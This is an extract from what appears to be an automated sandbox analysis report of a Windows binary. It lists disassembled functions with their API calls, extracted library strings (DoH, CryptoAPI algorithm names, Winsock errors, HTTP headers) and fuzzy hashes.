Opcode Fuzzy Hash: 84b6eab3dac30dd0c7db40f185ccc60bab2d407ff4ed9a95af4507aa3cac41ab
Instruction Fuzzy Hash: 4F017C26B0469182E304DF26E88052ABBB0FB88FC0B998031CB5C43758CFB8E5468750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE0E40 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 835COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DE1306

Strings

Failed to encode DoH packet [%d], xrefs: 00007FF7F1DE112D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_func
String ID: Failed to encode DoH packet [%d]
API String ID: 711238415-614724559
Opcode ID: 0132bdc6058aed386cc33b4a69fc5ad1fc74a49b7418f19ef67d7fa31cecbfb3
Instruction ID: 1c91f5f2dd9769cac5ef99280211450329e2dd006231ecb973e5b1cb78f6dbb7
Opcode Fuzzy Hash: 0132bdc6058aed386cc33b4a69fc5ad1fc74a49b7418f19ef67d7fa31cecbfb3
Instruction Fuzzy Hash: 30827426B0868592EB08FB25D5403BCA3B4FB45B85F848435CA6E177D5CFBDE461C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBD6F4 Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

-----BEGIN PUBLIC KEY-----, xrefs: 00007FF7F1DBD725
-----END PUBLIC KEY-----, xrefs: 00007FF7F1DBD750

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----
API String ID: 0-1157147699
Opcode ID: 3b797f3d02f1237fb1534b4b50888a7c942f9ac6f5f18a1c31b4eb0cf25eeb41
Instruction ID: 66cefbe919cedcc1c5761461eee0e3a8f3c775fe825ccf56599ff6e490e35acb
Opcode Fuzzy Hash: 3b797f3d02f1237fb1534b4b50888a7c942f9ac6f5f18a1c31b4eb0cf25eeb41
Instruction Fuzzy Hash: 25219125A09B8691EF19EB1A94441B4A7B0AF45F88F884035CE6F07BD5DFBCE446C3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE9C9C Relevance: 1.5, APIs: 1, Instructions: 34encryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DE9BD0: CryptAcquireContextA.ADVAPI32 ref: 00007FF7F1DE9BEC
Part of subcall function 00007FF7F1DE9BD0: CryptCreateHash.ADVAPI32 ref: 00007FF7F1DE9C0D

CryptHashData.ADVAPI32(?,00007FF7F1DC795A), ref: 00007FF7F1DE9CDE

Part of subcall function 00007FF7F1DE9C20: CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE9C49
Part of subcall function 00007FF7F1DE9C20: CryptGetHashParam.ADVAPI32 ref: 00007FF7F1DE9C6C
Part of subcall function 00007FF7F1DE9C20: CryptDestroyHash.ADVAPI32 ref: 00007FF7F1DE9C7B
Part of subcall function 00007FF7F1DE9C20: CryptReleaseContext.ADVAPI32 ref: 00007FF7F1DE9C8B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: Crypt$Hash$ContextParam$AcquireCreateDataDestroyRelease
String ID:
API String ID: 3606780921-0
Opcode ID: 33903e9631ea68ba9b79ee1d2b37164bd7a9b8be6849851d7280006c9cb37690
Instruction ID: 1fa71f9d409b938da682cd511e91a3e6b36b345f7cb4ea9b290844197d4fa9d3
Opcode Fuzzy Hash: 33903e9631ea68ba9b79ee1d2b37164bd7a9b8be6849851d7280006c9cb37690
Instruction Fuzzy Hash: 90F0C86270864642FB24B716B4A157AA3A0BB8CBC9F844031FE9D4BB89DF6CD5118B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DBE4F0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f0756801c119c3ca93350c31e5009191f05ee7f902fb0d32e5593b0c32e4de4
Instruction ID: 3793a79ddd6b85d5e6f47ed38bd4a3b5180496fde02f098db434931f702271de
Opcode Fuzzy Hash: 5f0756801c119c3ca93350c31e5009191f05ee7f902fb0d32e5593b0c32e4de4
Instruction Fuzzy Hash: 6A31633180954599E39BE63C4228639E2B69F41B04FBC8732D11B324D4FFBD74C2A5A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE6560 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22bd18be722e122f8150024359f21294a4f6716354f23e3615689319c545e64f
Instruction ID: e082b58a5565893149e7652097f30f7c14c46c7b7a8e9f87ef30b1fc595e0c35
Opcode Fuzzy Hash: 22bd18be722e122f8150024359f21294a4f6716354f23e3615689319c545e64f
Instruction Fuzzy Hash: 6BA02431705C05C0D3104700F150F105730F7C4705740C430C41C45414CF74C101D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DEBA8C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a495843244666959e901a4133de7526445879ec1bc81ae1c5531b20c7eb1d85
Instruction ID: 0f945f4ed300d58e356efbac75c1384d4cf88724aadaebab088585e6251ad7b7
Opcode Fuzzy Hash: 5a495843244666959e901a4133de7526445879ec1bc81ae1c5531b20c7eb1d85
Instruction Fuzzy Hash: 96A00121949C16D5EB58AB00A850021A630AB90303FC08031E02E414E09FECA444D3B2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9256C Relevance: 95.3, APIs: 76, Instructions: 280COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92587
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92597
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D925A5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D925B3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D925C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D925D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D925EF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92600
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92614
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92628
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9263C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92650
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92664
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92678
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9268C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D926A0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D926B4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D926C8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D926DC
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D926F0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92704
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92718
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9272C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92740
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92754
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92768
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9277C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9279C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D927B0
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D927C4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D927E4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D927F2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92800
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9280D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9283E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92852
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92866
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9287A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9288E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D928A2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D928B6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D928CA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D928DE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D928F2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92906
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9291A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9292E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92942
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92956
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9296A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9297E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92992
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D929A6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D929BA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D929CE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D929E2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D929F6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A0A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A1E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A32
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A46
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A5A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A6E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A82
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92A96
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92AAA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92ABE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92AD2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92AE6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92AF7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92B95
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92BA9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92BBD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92BD1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92BE5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92BF9

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b97e90704252db1c4e0597ed25d571f5cbd5bb8b77ae79f981928d8bcf10b950
Instruction ID: 78063d8708138ba7ee8ab5b5a4f13afcf6eb7b3c322aebd327514c9f463f593a
Opcode Fuzzy Hash: b97e90704252db1c4e0597ed25d571f5cbd5bb8b77ae79f981928d8bcf10b950
Instruction Fuzzy Hash: 5802E836655B81AAD78DAF21E5942A8B374FB88B41F444835CF6E43359EFB8B074C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDC8C4 Relevance: 91.1, APIs: 3, Strings: 49, Instructions: 65stringCOMMON

Download Yara Rule

APIs

strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DDC90A

Part of subcall function 00007FF7F1DDC8C4: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DDC316
Part of subcall function 00007FF7F1DDC8C4: strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DDC336

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DDC92E
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DDC948

Strings

CALG_DSS_SIGN, xrefs: 00007FF7F1DDC406
CALG_DES, xrefs: 00007FF7F1DDC460
CALG_SCHANNEL_ENC_KEY, xrefs: 00007FF7F1DDC67C
CALG_SEAL, xrefs: 00007FF7F1DDC514
CALG_MAC, xrefs: 00007FF7F1DDC3CA
CALG_AES, xrefs: 00007FF7F1DDC7C6
CALG_MD4, xrefs: 00007FF7F1DDC364
CALG_SSL2_MASTER, xrefs: 00007FF7F1DDC6B8
CALG_HMAC, xrefs: 00007FF7F1DDC712
CALG_RC5, xrefs: 00007FF7F1DDC6F4
CALG_DESX, xrefs: 00007FF7F1DDC4BA
CALG_SHA, xrefs: 00007FF7F1DDC39A
CALG_HUGHES_MD5, xrefs: 00007FF7F1DDC58C
CALG_TLS1_MASTER, xrefs: 00007FF7F1DDC6D6
CALG_MD2, xrefs: 00007FF7F1DDC32F
USE_STRONG_CRYPTO, xrefs: 00007FF7F1DDC927
CALG_SSL3_SHAMD5, xrefs: 00007FF7F1DDC604
CALG_RC2, xrefs: 00007FF7F1DDC4D8
CALG_AES_256, xrefs: 00007FF7F1DDC7A8
CALG_HASH_REPLACE_OWF, xrefs: 00007FF7F1DDC74E
CALG_DH_EPHEM, xrefs: 00007FF7F1DDC550
CALG_SKIPJACK, xrefs: 00007FF7F1DDC5AA
CALG_RSA_SIGN, xrefs: 00007FF7F1DDC3E8
CALG_SCHANNEL_MASTER_HASH, xrefs: 00007FF7F1DDC640
CALG_ECDSA, xrefs: 00007FF7F1DDC87A
CALG_RSA_KEYX, xrefs: 00007FF7F1DDC442
CALG_ECDH_EPHEM, xrefs: 00007FF7F1DDC898
CALG_TLS1PRF, xrefs: 00007FF7F1DDC730
CALG_RC4, xrefs: 00007FF7F1DDC4F6
CALG_3DES_112, xrefs: 00007FF7F1DDC47E
CALG_SHA_256, xrefs: 00007FF7F1DDC7E4
CALG_SHA1, xrefs: 00007FF7F1DDC3B2
CALG_CYLINK_MEK, xrefs: 00007FF7F1DDC5E6
CALG_SHA_384, xrefs: 00007FF7F1DDC802
CALG_TEK, xrefs: 00007FF7F1DDC5C8
CALG_AGREEDKEY_ANY, xrefs: 00007FF7F1DDC56E
SCH_USE_STRONG_CRYPTO, xrefs: 00007FF7F1DDC93E
CALG_MD5, xrefs: 00007FF7F1DDC37F
CALG_NO_SIGN, xrefs: 00007FF7F1DDC424
CALG_ECDH, xrefs: 00007FF7F1DDC83E
CALG_ECMQV, xrefs: 00007FF7F1DDC85C
CALG_3DES, xrefs: 00007FF7F1DDC49C
CALG_AES_128, xrefs: 00007FF7F1DDC76C
CALG_SCHANNEL_MAC_KEY, xrefs: 00007FF7F1DDC65E
CALG_PCT1_MASTER, xrefs: 00007FF7F1DDC69A
CALG_DH_SF, xrefs: 00007FF7F1DDC532
CALG_SSL3_MASTER, xrefs: 00007FF7F1DDC622
CALG_AES_192, xrefs: 00007FF7F1DDC78A
CALG_SHA_512, xrefs: 00007FF7F1DDC820

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncmp$strcmpstrncpystrtol
String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$SCH_USE_STRONG_CRYPTO$USE_STRONG_CRYPTO
API String ID: 1196261436-2313236003
Opcode ID: f2ba9ea898179d6e34b5565672f2f0a0001876c9ab92d7e0bb575b63a63dcc25
Instruction ID: 1d2c960d0ea153e74f41cffc1c370a3bcec48a5ffde75ea5e860818a8c8f460c
Opcode Fuzzy Hash: f2ba9ea898179d6e34b5565672f2f0a0001876c9ab92d7e0bb575b63a63dcc25
Instruction Fuzzy Hash: 50216D21B18B1281FB65AB269840265F7B4EF45BC1F885039CE6E437C4DFBCE45297A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAE524 Relevance: 76.7, APIs: 1, Strings: 50, Instructions: 229stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAE8E8

Strings

Winsock library is not ready, xrefs: 00007FF7F1DAE85A
Need destination address, xrefs: 00007FF7F1DAE606
Too many users, xrefs: 00007FF7F1DAE87E
Socket is unsupported, xrefs: 00007FF7F1DAE68A
Disconnected, xrefs: 00007FF7F1DAE899
Descriptor is not a socket, xrefs: 00007FF7F1DAE612
Too many references, xrefs: 00007FF7F1DAE773
Bad message size, xrefs: 00007FF7F1DAE5FA
Bad file, xrefs: 00007FF7F1DAE5B6
Address family not supported, xrefs: 00007FF7F1DAE666
Operation not supported, xrefs: 00007FF7F1DAE67E
Network has been reset, xrefs: 00007FF7F1DAE6E6
Connection refused, xrefs: 00007FF7F1DAE7FA
No data record of requested type, xrefs: 00007FF7F1DAE8BD
Bad access, xrefs: 00007FF7F1DAE5AA
Host unreachable, xrefs: 00007FF7F1DAE806
Host not found, xrefs: 00007FF7F1DAE8D8
Name too long, xrefs: 00007FF7F1DAE7E2
Winsock version not supported, xrefs: 00007FF7F1DAE84E
Out of file descriptors, xrefs: 00007FF7F1DAE586
Bad argument, xrefs: 00007FF7F1DAE59E
Protocol family not supported, xrefs: 00007FF7F1DAE672
Something is stale, xrefs: 00007FF7F1DAE86C
Timed out, xrefs: 00007FF7F1DAE7AF
Network unreachable, xrefs: 00007FF7F1DAE6F2
Invalid arguments, xrefs: 00007FF7F1DAE592
Network down, xrefs: 00007FF7F1DAE6FE
Not empty, xrefs: 00007FF7F1DAE890
Address already in use, xrefs: 00007FF7F1DAE6AE
Socket is already connected, xrefs: 00007FF7F1DAE797
Host down, xrefs: 00007FF7F1DAE7D6
Process limit reached, xrefs: 00007FF7F1DAE887
Socket has been shut down, xrefs: 00007FF7F1DAE77F
Bad quota, xrefs: 00007FF7F1DAE875
Bad protocol, xrefs: 00007FF7F1DAE62A
Winsock library not initialised, xrefs: 00007FF7F1DAE842
No buffer space, xrefs: 00007FF7F1DAE7A3
Blocking call in progress, xrefs: 00007FF7F1DAE61E
Host not found, try again, xrefs: 00007FF7F1DAE8CF
Loop??, xrefs: 00007FF7F1DAE7EE
Connection was aborted, xrefs: 00007FF7F1DAE6DA
Remote error, xrefs: 00007FF7F1DAE863
Address not available, xrefs: 00007FF7F1DAE70A
Protocol is unsupported, xrefs: 00007FF7F1DAE696
Socket is not connected, xrefs: 00007FF7F1DAE78B
Protocol option is unsupported, xrefs: 00007FF7F1DAE6A2
Call would block, xrefs: 00007FF7F1DAE5CE
Call interrupted, xrefs: 00007FF7F1DAE5C2
Unrecoverable error in call to nameserver, xrefs: 00007FF7F1DAE8C6
Connection was reset, xrefs: 00007FF7F1DAE716

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncpy
String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
API String ID: 3301158039-3442644082
Opcode ID: 55802d273112204894275d8ff223f6ce31bde9b4dd83ab5ea1dde2c5f824306a
Instruction ID: 9847b23f23ec20e8574878376e91707ff7469822507362356011e378a7c0018c
Opcode Fuzzy Hash: 55802d273112204894275d8ff223f6ce31bde9b4dd83ab5ea1dde2c5f824306a
Instruction Fuzzy Hash: 40B1C662D0C50391FBADFB2894A81749771AF81381FD59135C02E05AEAAFDEA944F3F0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCAA98 Relevance: 56.5, APIs: 3, Strings: 29, Instructions: 459stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA3884: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F1D95A63), ref: 00007FF7F1DA389D

_time64.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF7F1DCAE05
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DCAF43
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DCAF56

Strings

Strict-Transport-Security:, xrefs: 00007FF7F1DCB1D3
Proxy-Connection:, xrefs: 00007FF7F1DCAC14, 00007FF7F1DCAC6B
Content-Type:, xrefs: 00007FF7F1DCAB96
Persistent-Auth:, xrefs: 00007FF7F1DCB0A6
Invalid Content-Length: value, xrefs: 00007FF7F1DCAB7A
127.0.0.1, xrefs: 00007FF7F1DCAF39
Proxy-authenticate:, xrefs: 00007FF7F1DCB03B
Transfer-Encoding:, xrefs: 00007FF7F1DCAD29
Connection:, xrefs: 00007FF7F1DCACB2, 00007FF7F1DCACEE
Set-Cookie:, xrefs: 00007FF7F1DCAEEC
Location:, xrefs: 00007FF7F1DCB146
HTTP/1.0 proxy connection set to keep alive, xrefs: 00007FF7F1DCAC35
[::1], xrefs: 00007FF7F1DCAF4C
